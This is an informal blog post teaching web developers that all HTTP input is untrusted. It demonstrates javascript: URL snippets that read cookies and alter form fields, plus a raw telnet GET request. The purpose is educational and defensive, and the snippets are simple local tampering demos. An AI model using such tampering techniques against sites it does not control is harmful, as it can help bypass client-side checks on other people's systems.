|
Today I somehow landed on a page about JavaScript hacking. I found the article interesting so decided to search google on the subject: http://www.google.com.fj/search?q=javascript+hacking
To my annoyance none of the articles (I only read three and got too annoyed) really helped the reader understand how to defend themselves against “JavaScript Hacking” and to understand what it really is and why its possible.
Most explained how to “hack with JavaScript” and sounded more like tutorials for script kiddies rather than actual information for web developers.
What is JavaScript Hacking
The gist of it is that you can use a url scheme such as:
javascript:alert(document.cookie);
for example, to view or edit cookies on a webpage. (try pasting that into your browser address bar)
You can also change any Form element on a page via javascript.
javascript:alert(document.forms['formname'].fieldname.value="I changed you");
Actually the whole webpage can be modified.
Most developers will be bored now..
The only reason this is even an issue and I'm writing this lil piece is because some developers assume that hidden form fields, urls, and cookies and what else cannot be changed by a user.
If you believe this, you are a hazard to your web server. Please turn your web server off, it will thank you.
Life of your web server
The web server, when online, waits for HTTP Requests from a client (usually the web browser). This HTTP Request is a plain text message, asking for a web page or other resource believed to exist on your server. Your server will then reply with an HTTP Response, another text message.
Now, when a web client makes the HTTP Request to your server, it can send it anything. It could be “bla bla bla”. Off course your server will not understand this, so it will let the client know.
Now if your web browser did send something useful to the server, like a request for the index page:
GET / HTTP/1.1
HOST: www.example.com
then the server at www.example.com would reply with, the HTML of the index page.
Send a HTTP GET Request via Windows Telnet
You can try this out for yourself without a web browser.
On windows:
- Open the Command Prompt (Start -> Run -> [type in cmd])
- In the command prompt type in: telnet www.example.com 80
Now type in the HTTP Request:
GET / HTTP/1.1
HOST: www.example.com
Hit enter twice.
You should see the HTML source of the index page on www.example.com
(You can do exactly the same thing on a Linux Shell)
Now do those steps again, but this time send the server “bla bla bla”.
Now you see that you can send what ever you want to a web server. HTML forms and hidden fields are just text. The only reason some developers think they can be trusted is because they have been confined to the web browser, which does not allow the web surfer to edit the HTML on the page without some knowledge of “JavaScript Hacking”. (Actually the todays breed of browsers have extensions that let you edit form fields, change HTML and do what ever you want).
Now an attacker of your server or your scripts will likely edit the HTTP Request with a tool other than the web browser, or maybe even use the command prompt.
What to Expect from a web client (browser)
As a web developer, you should always understand that any data you receive into your script from HTTP can be bogus data of any character and encoding - not because you can use “JavaScript Hacking” to hack HTML elements rendered on a browser, but because of the nature of the HTTP protocol.
Even the users IP address, HTTP Referer (note its spelled wrongly, blame those who wrote the HTTP Specs), Cookies – everything in a HTTP Request is whatever you want it to be if you use the comand prompt like explained. (The IP is not in the HTTP Request, but like the HTTP Request, even what you send in the underlying protocols are what ever you want them to be).
Its like sending a letter. You can write any address on it, and write any gibberish in it to fool who ever its addressed to. Just because there are rules/protocols to follow when writing a letter doesn't mean they will be followed. And just like with HTTP, you can send a fake letter to “Joe Example” at “Example Place” in order to attack his sanity.
Please please, don't trust any letters sent from your clients to your server, for your server's and your own sake.
Now protecting your server scripts is in itself a topic, but with this knowledge it should come easy.
True JavaScript Hacking
Don't disregard “JavaScript Hacking” altogether though. There is such a thing. It works on the insecurities in the browser, tricking the web surfer and the HTTP protocol itself, not on your server code. (The HTTP Request like I showed is what is used against insecure web server scripting).
By itself, “JavaScript Hacking” is useless. But when you have insecure scripting on your web server, that is open to an attack from an HTTP Request, then the attacker can send some JavaScript code to other users that use your server, in order to compromise their web browser.
Well, its a bit late here. So I'll cut this article short and write on how to secure your website/server later. Please leave a comment if you want.. :)
|
